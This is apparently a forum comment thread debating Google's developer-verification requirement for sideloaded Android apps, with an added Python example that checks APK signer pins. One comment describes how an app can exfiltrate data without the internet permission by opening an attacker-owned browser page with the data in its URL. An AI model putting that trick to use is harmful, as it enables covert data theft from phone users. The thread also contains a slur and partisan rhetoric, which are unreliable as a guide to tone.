And Google stopped providing device trees and driver binaries... and stopped releasing AOSP as often, and, and...
numpad0 · 1h ago
The number of people able to do that is fewer than those willing to send in copies of government IDs. Phones compatible with AOSP builds are rare outside small bubbles of Pixel users as well.
cyanydeez · 2h ago
I mean, you're pretty optimistic that the current fascism is going away any time soon.
pessimizer · 2h ago
> the people get so angry that they are forced to roll this back.
This is political fantasy. There is no mechanism for "the people" to force anyone to roll this back. They can vote for the candidate owned by google, or the candidate owned by google. If they want to find another candidate, they'll have to use google to find one.
rockemsockem · 2h ago
If enough people internal at Google get pissed off and raise this up enough it can legitimately get rolled back.
asdff · 2h ago
They will just get sacked for sycophants either here or abroad. For every principled worker there is, there is another person willing to eschew those principles for that paycheck. This is a desperate world by design to enable these tradeoffs by the very people who build, maintain, deploy, and ultimately control the world's systems.
saubeidl · 2h ago
A better world is possible. Rise up, workers! You have nothing to lose but your chains!
abeyer · 2h ago
and your salary
saubeidl · 1h ago
If the workers rise up properly, they can repossess oligarch riches instead!
abeyer · 1h ago
History has seemed to show the only likely outcome is the violent redistribution of riches from one set of oligarchs to another.
achierius · 41m ago
Based on what? Sure quips like that are catchy, but what "oligarchs" were there in the Soviet Union circa 1920-1989? The "nomenklatura", while well-off, were absolutely nowhere near the wealth of today's American oligarchs or modern (capitalist) Russian ones. Moreover, unlike oligarchs, they do not form a class: wealth does not transfer reliably one generation to the next, and individuals would phase in and out of high status according to their position in their career.
A very striking way to illustrate this is to look at the career histories of high government officials even very late into the Soviet Union. The last Minister of Coal, Mikhail Shchadov, was born in a village, worked in a mine, went to mining school for engineering, became head of his mine, and thereafter worked his way up the ranks until he was head of the whole apparatus. This story, not that of inherited wealth or monopolistic oligarchs, dominates the histories of Soviet ministers even very late in the decline of the Union.
Where is the "other set" of oligarchs of which you speak? There is none, which means there is hope for workers who might wish to enact fundamental economic change.
gumby271 · 27m ago
You mean the people actively building this system? I have to assume it's decently far along for them to make this announcement.
glenstein · 58m ago
Agree and disagree: the pressure on Unity worked, and on Sonos and, IIRC, on Google's "federated cohorts" idea.
But often people try to project their opinions onto "the people" and predict they will rise up, and there's probably 100 predictions in comment sections that are completely spurious to every one that actually happens.
So I'm not sure, but if I had to guess this one is a rare case where there may be real prospect of backlash.
logicchains · 3h ago
Anyone even remotely privacy or security conscious needs to vote with their wallet in protest and stop buying Android phones, otherwise it's only a matter of time 'til Google bans side-loading and it becomes impossible to buy a phone that can run any kind of anonymous or end-to-end encrypted communication software.
tgsovlerkhgsel · 3h ago
Stop buying Android and what? Buy an iPhone that's even more locked down or live like an outcast that can't access essential services? Because those are the realistic options.
fluoridation · 2h ago
For years I've been buying middle-of-the-road Android phones because they provide pretty good bang for the buck, but if I can't use a computer I paid for however the fuck I want, I'm just going to start getting the cheapest crap I can get away with and use it as little as possible. "Vote with your wallet" doesn't have to mean total abstinence.
opan · 9m ago
I think getting a flagship device that's a few years old probably makes for a better experience. I check the LineageOS supported devices list, then search eBay for something from there.
endgame · 1h ago
It really isn't that bad. I've never owned a smartphone, and can do everything I need through websites and the occasional phone call.
nunclieh · 2h ago
>live like an outcast that can't access essential services?
I don't own a smartphone and I am happy as ever. I used to own one a while back, but it wasn't worth the effort and the rage when it was slow.
If a service can be accessed only with a smartphone, I complain (which is of little use).
kovac · 1h ago
Do you not have to use a 2FA app for things like banking? In Singapore, they are phasing out 2FA options other than the banking app. The banking apps only work on iPhones and Google-approved Android phones. It's pretty bad.
jazzyjackson · 2h ago
Flip phones can access essential services just fine, if some business or government office is only allowing something to be done via smartphone app, that’s a problem.
itsanaccount · 3h ago
> live like an outcast
in all things. I would encourage you and everyone who reads this post to stare down this option with realistic consideration. In a society this broken, it is the solution to more and more things. To checkout, to accept the hard mode because to pick the path of convenience is to be exploited.
Again, and again, and again.
01HNNWZ0MV43FF · 2h ago
I've been doing it. That's why I'm vegan.
rockemsockem · 2h ago
I'm sorry, this is such a funny follow up comment, I literally lol-ed when I got to it.
itsanaccount · 2h ago
I respect at least your choice but I'm not growing tofu on the farm. Veganism is one of those protests that while I appreciate going after factory farms, you're only enabled to do so by large corporations.
echelon_musk · 54m ago
> _I'm not growing tofu on the farm_
What else are you growing?
busymom0 · 3h ago
What if people stopped buying brand new Android phones and instead bought used ones and then installed alternative Android versions and app stores.
out_of_protocol · 3h ago
Can't access banks, ticket systems etc. unfortunately we are in the era of tightened screws, the freedom is running out :(
eraviloi · 2h ago
Lol all these things work via the web. You just log on via the browser. Not everything needs an app.
homebrewer · 1h ago
In your country, maybe. Over here you're dead in the water without a smartphone — can't access banking except by going to the branch and standing in the queue for an hour or two, can't access most government services. Limit your selection of goods (like electronics, but not only that) by something like 90% (and also increase prices by 30-50%) because brick and mortar shops sell old crap at much higher cost than it was ever worth, and the only real solution is buying from a major marketplace which is only available as a mobile application.
This concept originated in China and is spreading. Beware.
nunclieh · 2h ago
@achrono (I cannot reply to the other post, I don't know why). Yes, you can use just a web browser.
> Mobile Payments
They work with a card, no smartphone required. Moreover, cash didn't cease to exist.
> Navigation
Again, physical maps are a thing. Google Maps or OpenStreetMap are accessible by browser. Having a physical map and having to follow road signs can be a beautiful experience. If one is addicted to a machine that tells them where to go, navigators are still a thing (no smartphone required)
>All manner of IoT devices
Don't put an IoT device in your house if you don't know what it does and how it works. If the only way to interface to it is via an app... then you don't know what it does and how it works. Don't put it in your house.
>Wearables
I don't even know what wearables are: if I write it on Firefox it underlines it in red. By doing a quick search, I can see images of watches. Watches can work without an app. Moreover, watches that work without an app are usually less expensive than the other kind.
>Digital versions of ID (Mobile Passport Control)
Don't. I know that some governments are pushing this crap thinking it's the future. Simply don't. Imagine you're at the airport and you accidentally drop your passport. You pick it up, nothing lost. Imagine you drop your phone and it stops working. You lost:
- Your documents
- Your money (if you rely on your phone for paying and don't have cash with you, which seems a growing trend among people I know)
- All your ways to contact people for help
Instead:
- Your wallet is stolen: you lost all your money and your cards, but you have your documents (at least the passport because it surely does not fit a wallet).
- Your phone is stolen: you lost all the ways to contact people, but you can buy another one
- Your passport is stolen: you can contact your embassy.
Smartphones are becoming a SPOF (Single Point Of Failure) for our lives.
Y_Y · 1h ago
> physical maps
Are you for real? I'm totally on board with using free and open alternatives, but if you're not going on a mountain trail then a physical map is going to be drastically worse than any navigation software.
Also FWIW I have a card-sized passport that I can easily get stolen with my wallet.
goda90 · 2h ago
Aren't there attestation frameworks under development that they could start using too?
kovac · 1h ago
The 2FAs require their mobile app sometimes.
achrono · 2h ago
Other than banks & ticketing, there is a whole host of things that do in fact need an app.
* Mobile payments
* Navigation
* All manner of IoT devices
* Wearables!
* Digital versions of ID (Mobile Passport Control)
etc.
So no, you can't just use the web.
A4ET8a8uTh0_v2 · 1h ago
But, and I hesitate to point it out, because I am finding that people think it is somehow minimal entry stakes, one does not need any of those things..
homebrewer · 1h ago
You wouldn't get very far without WeChat and AliPay in China. Last time a good friend of mine was there, many merchants simply refused to accept cash. The few that did had made it known how much they were inconvenienced by doing that.
Same for basically every interaction with locals, for accessing government services, or even just using the public transportation.
It's pretty similar for locals AFAIK.
And before anyone replies that he didn't have to travel there — no, he did, unless he was willing to look for another job (which are very sparse here, you hold on to a good job for dear life).
GuinansEyebrows · 2h ago
you can usually just use the web-interfaces for those services. less convenient, sure, but the options are there.
logicchains · 3h ago
Buy Apple; the point is to hurt Google. If enough people do it, Google might reconsider. Show them that the open ecosystem is the only value Android added, and if they refuse to bring back the open ecosystem then their platform will slowly die. Won't be long until Google's as locked-down as Apple at this rate, so all Android gives you is a power-hungry OS that protects your privacy even less than iOS does.
jraph · 2h ago
Buying closed stuff to show we want an open ecosystem?
At this point, I believe the most effective ways one can help with this is:
(1) advocacy - it's slow and difficult, but having people at least agree / be familiar with the idea that closed stuff is bad is a good first step.
Open ecosystems can't work for the general public if it's trapped in closed networks that won't work on anything else than the two big mobile operating systems, so making people start using open chat apps and such will help a lot. It'll take years, but so be it. It's worth it I think.
(2) helping improve the more open stuff.
I think Linux mobile for instance is a potentially viable alternative in the medium term for at least the basic use cases: Calls, SMS, GPS / Maps, Signal, photos. All this has no reason not to work with some polish. I daily drove Linux mobile 4 years ago for a year. The main thing I'm missing is good hardware for it, and a lot of polish but nothing impossible. Yeah, indeed, no payment with the phone (Google Pay / Apple Pay). But it's still possible to use the physical cards and not use the phone for this.
thyristan · 2h ago
You've got to be kidding. Doesn't work, Apple is even more locked down than what this article announces. No sideloading whatsoever, signature checks ala Play Protect are mandatory and cannot be switched off, no alternative app stores, etc.
outofpaper · 2h ago
You can side load three apps at a time outside the EU and unlimited inside the EU.
vachina · 2h ago
Not sure why this is downvoted. The entire value proposition of Android is the semi-open OS. For things you can’t do with Apple devices, you use the myriad of Android devices out there.
A locked-down Android is pointless.
homebrewer · 1h ago
Yet most of the world runs Android. Its main value proposition was always wide selection of hardware for however much money you're willing to spend, not its relative openness.
I make relatively decent money by our standards, and I wouldn't even think about dropping $700-1000 on a phone (which isn't even officially sold or supported over here). For the vast majority of people it's their whole income over 2-4 months. I don't know or care how much you make, let's say it's $10k per month. Imagine if you had to pay $20-40k for a phone which is good for maybe 5-8 years.
And most of the world is like that.
gigel82 · 3h ago
I'm curious what you think the alternative is, because Apple is definitely a lot worse, and we all know they're very much a duopoly.
BTW, all the GrapheneOS, etc. are still Android phones.
goda90 · 3h ago
I'm curious if GrapheneOS or other custom Android builds would be able to avoid these restrictions reasonably.
Obviously this is going to impact the supply of apps, since the market share of custom Android is smaller than even the market share of people willing to sideload or use an alternative store on a mainstream Android phone. Many developers might quit the game.
mysteria · 3h ago
The problem with custom ROMs is that many government, banking, and similar apps don't run on them without workarounds. Some of those apps also consider this as a TOS violation as well.
Zak · 3h ago
When Microsoft first proposed a remote attestation scheme for PCs under the name Palladium, it was widely seen as a nightmare scenario. Even the mainstream press was critical[0]. There was barely a whimper when Google introduced Safetynet a decade later.
It wasn't OK in 2003. It wasn't OK in 2014. It isn't OK now. I'm just not sure what anybody can do about it.
What changed is that the vast majority of users in 2025 are retarded normies that have never even considered trying to understand how their pocket computers work. And now that they are the majority, the voice of people that have even a remote understanding of how any of this works get drowned in the noise of social media divisiveness. Divide and Conquer. Oldest play in the book.
steve_taylor · 57m ago
There are many third-party money apps that log in to your online banking that are a violation of ToS. That doesn't stop people using them. In fact, when they get really big, they can be legitimised by banks. For example, to get my mortgage, I had to use a third party service that logs in to my online banking account and ingests all my transactions to show that I saved for my deposit legitimately.
afandian · 2h ago
I don’t use any utility apps (identity, banking, services etc) on my phone and stick to the desktop web. And don’t use services that do require me to have a Google or apple account and phone. (Spoiler: I do)
I hope my tiny datapoint shows up in some aggregated stats somewhere.
It’s use-it-or-lose-it.
thrtythreeforty · 3h ago
Then I won't run those apps. Seriously. I know not everyone has this option, but it's been my experience that a lot of processes do in fact have workarounds when you show them the cryptic error their poorly behaved app throws.
codethief · 1h ago
I have been a GrapheneOS user since the Pixel 3 and have yet to encounter an app that doesn't work on GOS.
Basically none of this new restriction will bother me, since I don't run anything but stock AOSP and get all my apps from f-droid repos.
42lux · 2h ago
It's really nice when you first use it but if you have to use it as a daily driver it's pure pain. Rather go for graphene.
anonym29 · 3h ago
GrapheneOS is a beautiful stop-gap, but there are real bona-fide Linux smartphones out there. To be clear, there are not many, the hardware often isn't great, the software often isn't great. PinePhone and Librem come to mind.
opan · 5m ago
In addition to the PinePhone and Librem 5, you can also put postmarketOS on some faster Android phones like the OnePlus 6T.
RedComet · 2h ago
Cell carriers will just start requiring the attestation as well. And eventually, even an internet connection will - wifi routers will have to attest to ISP equipment, etc.
The final phase is "AI" monitoring everything you do on your devices. Eventually it won't just be passive, either, but likely active: able to change books you read and audio you listen to on-the-fly without your consent. It will be argued that this is ok because the program is "objective".
wishfish · 1h ago
I've been keeping an eye on FuriLabs (Furiphone). They maintain FuriOS - Debian with an Android kernel. Has a container for running Android apps. Price is reasonable though I don't know how it'll be affected by tariffs in the US. It's tempting.
The alternative is just Apple; if Google loses enough users they might reconsider. Essentially the only real advantage Android had over Apple was being a more free platform/ecosystem; if they're going to do away with that, then they should be shown that this means they'll lose a lot of users.
thyristan · 2h ago
Even with this change, Android is still more free than iOS by far.
matheusmoreira · 1h ago
Utterly pointless.
Banking apps, messaging apps, streaming apps, even video games all want locked down devices. They will use hardware cryptography to discriminate against us and refuse service if they can't cryptographically prove we're using a corporate owned device.
Naughty user. Looks like you've been tampering with your device, installing unauthorized software and whatnot. Only money laundering drug trafficking child molesting terrorists do that. I'm gonna have to deny your request to log you into your bank account.
rkagerer · 3h ago
I've grown increasingly hateful towards both my Android and iOS devices over the last decade. The platforms themselves are increasingly user-hostile, and their appstores are crammed full of shitty, privacy-invading, telemetry-hoovering, dopamine-triggering, ad-filled, lipstick-covered apps that are often garbage compared to the pioneering days of mobile. I miss the days of my old Palm Pilot.
Is anyone working on fixing this? We can do so much better.
fzeindl · 4m ago
I think before we can fix all that we need to revert the renting of software via subscriptions and go back to one-time-payment. But people are too greedy for that.
miloignis · 2h ago
GrapheneOS + F-Droid is a joy to use, for me. I'm kinda shocked when I use anyone else's phone, now.
If they start selling their own devices, I will buy one and (assuming it turns out how I hope it will) recommend it strongly.
emidoots · 2h ago
Side note, I read that GrapheneOS project is having some challenges recently.. between [0]the Android kernel drivers no longer having their Git history of changes being released (only a code dump with no history) - and [1]one of Graphene's two core contributors being detained/conscripted into a war.
How do you access banking and other sensitive apps? If the answer is, you don't, well, you can see how that's a non starter for the vast majority of people.
A web browser in the worst case scenario. The same way you'd do it on a computer.
debazel · 2h ago
This is quickly disappearing as an option as well. I need my bank app to authenticate even when using a web browser on desktop. Luckily my bank's app still works on GrapheneOS, but I suspect it's only a matter of time before they disable that because of "security" reasons.
markasoftware · 28m ago
What bank is this? No bank I know /requires/ you to use a mobile app for anything; the web is enough. 2FA can usually be done via email, SMS, or a google-authenticator-compatible app.
Pxtl · 33m ago
Android apps will be the IE6 activeX controls of the future.
GeoAtreides · 1h ago
Second phone for all official business apps, banking, etc. Never leaves home and it's used only for this purpose
jiggunjer · 22m ago
Then use a laptop instead? Or you have one of those "modern" banks that's app only?
ethagnawl · 2h ago
What's wrong with their web apps? The only real shortcoming I can think of is depositing checks digitally but I haven't had to do that in years.
bogwog · 2h ago
As a GrapheneOS user, the way I access my banking app is by downloading it from the Google Play store just like everyone else.
rcxdude · 1h ago
They don't all work, though: too many crank up the settings on google's various 'integrity' checks and will fail on anything that isn't 100% google-blessed. (Which is insane, because that's all that's required: on a previous phone of mine, it worked fine with a stock ROM with a bluetooth-based RCE, but upgrading to a custom ROM would have meant it was 'insecure')
anticrymactic · 1h ago
Most banking apps work, either directly or with a settings change to allow Google Play Service emulation. [1]
My credit union app already wants 24x7 GPS tracking of my location and full access to my camera at all times and full access to my collection of photos, so the app is already dead to me anyway. Demanding that I use it on a locked down device isn't going to change anything for me, I'm already actively not using it. I use the website on a desktop, I rarely need to access my CU at all much less access it remotely.
Given the large amount of battery and bandwidth already used to track my every move, I wish there was something like "Docker for phones" where I could enable and disable 24x7 full access to my every action IRL.
Pxtl · 36m ago
Uh, my bank has a pretty good mobile website, personally.
foobar47859 · 2h ago
Volla from Germany is one: https://volla.online/. They sell a nice set of devices that run either a custom Android or Ubuntu Touch. Their custom Android has a nice bunch of UI and privacy features.
Another one is https://murena.com/ which (IIRC) is based in France. They don't have their own hardware though, they sell partner phones with their ROM preinstalled.
margalabargala · 2h ago
For once Fairphone never updating their phones will work in our favor! If Google rolls this out in early 2026, anyone with a Fairphone can rest easy that they won't receive that version of the operating system until mid-2028 at least.
worldsayshi · 1h ago
> Fairphone never updating their phones
I have a Fairphone and I get updates pretty frequently so not sure what you mean?
margalabargala · 1h ago
What major version of Android are you on? Last I checked (a few months ago) all Fairphones were still on Android 13.
You can enjoy “good old days” from what you remember of iOS and android.
I also say enjoy the LLM good new days while they last.
steve_taylor · 54m ago
I'm right there with you. These platforms are cancer. There's a small but growing movement away from smart phones. It'll probably never go mainstream, though.
indrora · 2h ago
Windows 10 Mobile was good.
The entire developer experience was fantastic and the thing that killed it was a lack of desire from the upper leadership when it felt like they couldn't compete with the duopoly.
toast0 · 2h ago
The developer experience was trash.
Did you have a wince app? Too bad, throw away all that and rebuild for wp7.
Do you want to do anything useful? Actually, you better wait for wp7.5.
Oh look, we have a totally new thing with WP8. Upgrade to the newest framework so you can use the WP8 features... Oh, but you still need to build for the old framework for WP7. Hey, how about WP8.1, kind of the same deal.
My personal favorite though was WM10; you now need to build a Universal app that only runs on the very small number of WM10 phones... If you want to run on WP7 and WP8 which still have more sales, a universal app doesn't run there. Also, even though we said WP8 phones would be able to upgrade, either we changed our mind, or the experience is so bad most people won't. And the cherry on top... Users who upgrade from 8 to 10 might need to delete and reinstall the app, otherwise it will just show the loading dots.
Did we mention, we decided we didn't need engineers in Test in the run up to WM10? Couldn't possibly be why the release was terrible.
Hilift · 2h ago
Mobile in general is a second class ecosystem. You're paying to ride in a bus that most ride for free, and when you sit down it's squishy.
userbinator · 1m ago
The desire for people to keep using their currently working devices just got much bigger, and yet another good reason to root.
The infamous Franklin quote always comes to mind when I see things like this happening. Choose freedom over security while you still can, or you'll soon not even have the freedom to choose.
hn8726 · 3h ago
> developers will have the same freedom to distribute their apps directly to users through sideloading or to use any app store they prefer. We believe this is how an open system should work—by preserving choice while enhancing security for everyone
I guess words don't have meaning anymore, how can you claim to have an open system in an announcement about closing it down?
It's also telling that the big supporters of this are apparently corporations and governments. Admittedly I don't know what "Developer's Alliance" is but they don't seem to care about developers very much, and I wouldn't be surprised if they were just a "pay us to say what you're doing is good for devs" kind of thing
ocdtrekkie · 2h ago
The Developer's Alliance address is a coworking space in Washington DC, if you want to rate the likelihood it's just an astroturf for public tech policy wonks.
mysteria · 3h ago
The article didn't say much about the account approval process, but from the looks of it Google will be able to arbitrarily accept and revoke applications as they see fit. So much for an open platform, bring forth the gatekeeping!
Personally I would be fine with unsigned apps requiring the user to click through a notice before install, or having a setting to toggle to enable unsigned apps. Windows does something similar to this where unsigned binaries get a pop up warning but signed ones are executed immediately.
fph · 2h ago
That's the first step toward banning NSFW apps like on Steam, I'm afraid.
abeyer · 2h ago
Even aside from the privacy implications (which aren't trivial themselves,)
Doesn't this make it prohibitively difficult to do local builds of open source projects? It's been a long time since I've done this, but my recollection was that the process to do this was essentially you would build someone else's (the project's) package/namespace up through signing, but sign it locally with your own dev keys. A glance at the docs they've shared makes it sound like the package name essentially gets bound to an identity and you then can't sign it with another key. Am I misremembering and/or has something changed in this process? Am I missing something?
luke-stanley · 2h ago
A repo is just files in a directory, so the namespace can be changed, but the whole thing stinks. Having to set up Android signing keys and needing to provide ID is not fun.
It means you won't easily be able to run builds on Google certified Android devices that aren't from "approved" people.
abeyer · 2h ago
That's where the "prohibitively difficult" part comes in... surely they don't expect every developer on every open source app in the world to have their own app registration/package name for the same app, do they? Feels like an N * M problem, if so.
luke-stanley · 2h ago
They are namespacing, like it or not, and clearly they don't care about open-source that much.
EMIRELADERO · 4h ago
So that's it then.
If this actually goes through, there will be no option in the mobile OS market for an OS that both:
a) allows the installation of apps without any contractual relationship with any party, and
b) allows the use of mainstream and secure apps like banking
CalRobert · 4h ago
In time, you will only be able to access banking from your desktop using an approved OS and browser with attestation...
ffsm8 · 3h ago
For what conceivable reason would they make the users go on desktop, considering mobile is in the process of being fully locked down?
If anything, they'd eventually deny access from desktop, forcing everyone to login via the fully managed mobile devices without any user freedom.
Some banks are already getting there btw, as their preferred 2fa is a companion app... One small step away from making that the only option, effectively denying access to anyone without a locked down mobile device.
saurik · 1h ago
I think they worded that poorly, but didn't mean what you got from it: the point I'd take isn't that they will require you to have a desktop, but that even desktop will also have the same restrictions, so it isn't just a mobile problem.
crvdgc · 1h ago
A recent real life example:
You can apply for an HSBC Global Money Account if you have:[…]The HSBC UK Mobile Banking app (Global Money is only available via the app)
It's already that way in my country. The few banks that still have the web version only support it for their business clients, and it's only something like two or three banks. If you're a regular client, there's not a single bank left that you can still use without a smartphone (unless you're ready to visit a branch for every little thing — so pretty much daily).
slyzmud · 1h ago
Actually my bank already requires me to use the phone app for any operation on the website. When I want to login from my laptop I need to use my phone with their app to approve the login, same for almost any operation.
Ah, and it can only be installed in one device at the same time :D Don't have your phone available? Bad luck for you
BLKNSLVR · 44m ago
> can only be installed in one device at the same time
I neither like nor understand this restriction. It makes device failure / loss / theft a much more difficult experience to recover from than it would otherwise be. The device should be throwaway. I specifically keep old phones in case something happens to the new one.
WhatsApp is probably the stupidest example of only being able to be on a single device (but I'm forced to use WhatsApp for one specific purpose, so I already resent it). Signal does the same thing, so maybe it's related to the E2EE that WhatsApp licensed from Signal...
al_borland · 55m ago
I have a huge problem with companies using their own apps for 2FA.
Google started doing this for Gmail. To use Gmail on my laptop, I need to approve it with Gmail on my phone. I never signed up for this. I’m now afraid if I delete the Gmail app from my phone that I’ll lose access to my email.
I hate the direction “security” is taking us. It’s done in the name of security, but it feels more like blackmail to get and keep the company app on your phone.
Pxtl · 18m ago
I do like how many apps are starting to play nice with 3rd party authenticators. I use MS Authenticator for a bunch of things. Although knowing MS it has some massive license fee for them to support.
tgsovlerkhgsel · 3h ago
De facto, this is already the case - you can use your computer as a display but to actually authorize a login or transaction you need your phone with said attestation.
arp242 · 2h ago
Not true for either my AIB or Wise account.
zeta0134 · 1h ago
True for PayPal though. I just recently had to jump through seven different hoops to verify my ID (with creepy, creepy face scans) and they absolutely refused to even start the process on desktop. Eventually got the stupid thing to work on my iPad; Android+Firefox was a no go, and it's stock Pixel 5a with Google OS.
Thankfully I don't actually rely on PayPal for anything serious, but there are artists whose commission I like to pay, and being able to actually pay them would be nice. :/
int_19h · 44m ago
For logins, at least, they support passkeys on the desktop as well, so long as the browser does it. Which basically means Win11 or macOS, either some Blink-based browser or Safari.
arp242 · 1h ago
I mean, I'm sure it's true for some banks or financial services, but that's not really the same thing.
Night_Thastus · 2h ago
A dedicated app on a locked down OS is vastly more controllable than something like a browser that can do virtually whatever it wants.
tremon · 1h ago
Controllable by whom? I don't do any banking on my phone exactly because I don't trust my phone to keep anything I do on my phone private.
prism56 · 3h ago
I'll just have to disable it and choose a banking app that works on the browser. Tonnes of my apps are sideloaded. Quite a few are on the playstore or the dev might upload their details.
Personally...we all know the Play Store is chock full of malicious garbage, so the verification requirements there don't do jack to protect users. The way I see it, this is nothing but a power grab, a way for Google to kill apps like Revanced for good. They'll just find some bullshit reason to suspend your developer account if you do something they don't like.
Every time I hear mentions of "safety" from the folks at Google, I'm reminded that there's a hidden Internet permission on Android that can neuter 95% of malicious apps. But it's hidden, apparently because keeping users from using it to block ads on apps is of greater concern to Google than keeping people safe.
> we will be confirming who the developer is, not reviewing the content of their app or where it came from
This is such an odd statement. I mean, surely they have to be willing to review the contents of apps at some point (if only to suspend the accounts of developers who are actually producing malware), or else this whole affair does nothing but introduce friction.
TFA had me believing that bypassing the restriction might've been possible by disabling Play Protect, but that doesn't seem to be the case since there aren't any mentions of it in the official info we've been given.
On the flip side, that's one less platform I care about supporting with my projects. We're down to just Linux and Windows if you're not willing to sell your soul (no, I will not be making a Google account) just for the right to develop for a certain platform.
UncleMeat · 2h ago
> Every time I hear mentions of "safety" from the folks at Google, I'm reminded that there's a hidden Internet permission on Android that can neuter 95% of malicious apps. But it's hidden, apparently because keeping users from using it to block ads on apps is of greater concern to Google than keeping people safe.
You've never needed the internet permission to exfiltrate data. Just send an intent to the browser app to load a page owned by the attacker with the data to be exfilled in the query parameters.
gumby271 · 2h ago
Wouldn't that launch the browser app and bring it to the foreground? I wouldn't compare that to having full network access.
UncleMeat · 30m ago
It'd launch the browser app. You can have your evil page redirect to a benign page so it just looks like Chrome randomly opened or whatever. It is not as powerful as full network access as you can only send so much information in query parameters, but if you are doing some phishing or stealing sms 2fa codes or whatever then it is plenty to send back whatever payload you wanted to.
And of course basically every app requires internet permissions for ordinary behavior. The world where an explicit internet permission would somehow get somebody to look askance at some malware that they were about to download is just not believable.
zozbot234 · 3h ago
> had me believing that bypassing the restriction might've been possible by disabling Play Protect, but that doesn't seem to be the case since there aren't any mentions of it in the official info we've been given.
I don't think we can know for sure before the change is actually in place. Going through Play Protect would certainly be the easiest way of implementing this - it would be a simple change from "Play Protect rejects known malware" to "Play Protect rejects any app that isn't properly notarized". This would narrowly address the issue where the existing malware checks are made ineffective by pushing some new variant of the malicious app with a different package id.
It's a big change for the ecosystem nonetheless because it will require all existing developers to register for verification if they want to publish a "legit" app that won't be rejected by any common Android device - and the phrasing of the official announcements accurately reflects this. But this says nothing much as of yet about whether power users will be allowed to proactively disable these checks (just like they can turn off Play Protect today, even though very few people do so in practice).
A4ET8a8uTh0_v2 · 1h ago
<< we will be confirming who the developer is, not reviewing the content of their app or where it came from
To be honest, it almost makes me wonder if the issue here is not related to security at all. I am not being sarcastic. What I mean is, maybe the issue revolves around some of the issues MS had with github ( sanctions and KYC checks ).
black3r · 2h ago
> This is such an odd statement. I mean, surely they have to be willing to review the contents of apps at some point (if only to suspend the accounts of developers who are actually producing malware), or else this whole affair does nothing but introduce friction.
Requiring company verification helps against some app pretending to be made by a legitimate institution, e.g. your bank.
Requiring public key registration for package name protects against package modification with malware. Typical issue - I want to download an app that's not on available "in my country" - because I'm on a holiday and want to try some local app, but my "play store country" is tied to my credit card and the developer only made it available in his own country thinking it would be useless for foreigners. I usually try to download it from APKMirror. APKMirror tries to do signature verification. But I may not find it on APKMirror but only on some sketchy site. The sketchy site may not do any signature verification so I can't be sure that I downloaded an original unmodified APK instead of the original APK injected with some malware.
Both of these can be done without actually scanning the package contents. They are essentially just equivalents of EV SSL certificates and DANE/TLSA from TLS world.
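Added example, not part of the thread or any commenter's code: a Python sketch of the check described in the comment above, comparing an APK's signing-certificate digest against a digest registered for its package name without inspecting the package contents. The pin registry, package names and digests are constructed, and the input line formats are assumed to follow `aapt dump badging` and `apksigner verify --print-certs` output.

```python
import re
from typing import Dict, List, Optional

# First line of `aapt dump badging app.apk` (assumed format).
PKG_RE = re.compile(r"^package: name='([^']+)'", re.MULTILINE)
# Per-signer digest line of `apksigner verify --print-certs app.apk` (assumed format).
DIGEST_RE = re.compile(
    r"^Signer #\d+ certificate SHA-256 digest: ([0-9a-fA-F]{64})\s*$",
    re.MULTILINE,
)

# Constructed sample values: two different certificate digests.
GENUINE_DIGEST = "a1" * 32
REPACKED_DIGEST = "b2" * 32

# Constructed registry: package name -> SHA-256 digest of the registered signing cert.
REGISTERED_PINS: Dict[str, str] = {"org.example.bank": GENUINE_DIGEST}


def parse_package_name(badging: str) -> Optional[str]:
    """Return the package name from badging output, or None if absent."""
    match = PKG_RE.search(badging)
    return match.group(1) if match else None


def parse_signer_digests(apksigner_out: str) -> List[str]:
    """Return the lower-cased SHA-256 digest of every signer certificate."""
    return [d.lower() for d in DIGEST_RE.findall(apksigner_out)]


def check_apk(badging: str, apksigner_out: str, pins: Dict[str, str]) -> str:
    """Decide whether an APK is signed by the key registered for its package."""
    package = parse_package_name(badging)
    if package is None:
        return "reject: no package name"
    # A failed verification, or no signer at all, must never fall through to "ok".
    if "DOES NOT VERIFY" in apksigner_out:
        return "reject: signature invalid"
    digests = parse_signer_digests(apksigner_out)
    if not digests:
        return "reject: signature invalid"
    pin = pins.get(package)
    if pin is None:
        return "unknown: package not registered"
    # The signer set must be exactly the registered key; an extra or
    # different signer means the package was re-signed by someone else.
    if set(digests) != {pin.lower()}:
        return "reject: signer mismatch"
    return "ok"


def sample_badging(package: str) -> str:
    """Constructed badging output for the given package name."""
    return f"package: name='{package}' versionCode='42' versionName='4.2.0'\n"


def sample_apksigner(digest: str) -> str:
    """Constructed apksigner output for a single signer."""
    return (
        "Signer #1 certificate DN: CN=Constructed Example\n"
        f"Signer #1 certificate SHA-256 digest: {digest}\n"
        f"Signer #1 certificate SHA-1 digest: {'0' * 40}\n"
    )


if __name__ == "__main__":
    cases = {
        "original APK": (sample_badging("org.example.bank"),
                         sample_apksigner(GENUINE_DIGEST)),
        "re-signed copy": (sample_badging("org.example.bank"),
                           sample_apksigner(REPACKED_DIGEST)),
        "unregistered app": (sample_badging("org.example.level"),
                             sample_apksigner(REPACKED_DIGEST)),
    }
    for label, (badging, signer_out) in cases.items():
        print(f"{label}: {check_apk(badging, signer_out, REGISTERED_PINS)}")
```

The re-signed copy keeps the package name but fails the pin, which is the case a download site without signature verification cannot catch.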
baby_souffle · 3h ago
Can you elaborate a little bit about this hidden internet access control setting?
Google also used to show you which apps used Internet permission in Play Store. But they removed it, which makes it harder to notice which apps don't use it.
Google mostly doesn't let you deny permissions while running apps that require them; recently there's some permissions that you can pick at runtime. So it's not surprising that they don't let you deny this one, when they don't even show it in the store.
9cb14c1ec0 · 1h ago
Even device owner (MDM) apps can't revoke that permission.
fph · 1h ago
You can deny it on Graphene OS.
87636899376 · 3h ago
"Hidden" isn't exactly right. It's completely inaccessible, unless you use a custom ROM like LineageOS. But it is a real permission:
> But it's hidden, apparently because keeping users from using it to block ads on apps is of greater concern to Google than keeping people safe.
The internet permission has nothing to do with ads? It's a hidden permission because:
1) Internet connection is so ubiquitous as to just be noise if displayed
2) It's not robust, apps without Internet permission can still exfiltrate data relatively easily by bouncing off of other apps using Intents and similar
tgsovlerkhgsel · 3h ago
It absolutely has to do with ads. While there are various ways to exfiltrate small amounts of data, the non-collaborative ones are rarely silent and most importantly, they won't let the app get responses (e.g. ads) back.
The main thing this permission would be used for would be blocking ads. Also distinguishing shitty apps that are full of ads from those that aren't. If there is a calculator that needs Internet and one that doesn't, which one are you going to use?
87636899376 · 3h ago
> 1) Internet connection is so ubiquitous as to just be noise if displayed
That doesn't make it any less useful.
> 2) It's not robust, apps without Internet permission can still exfiltrate data relatively easily by bouncing off of other apps using Intents and similar
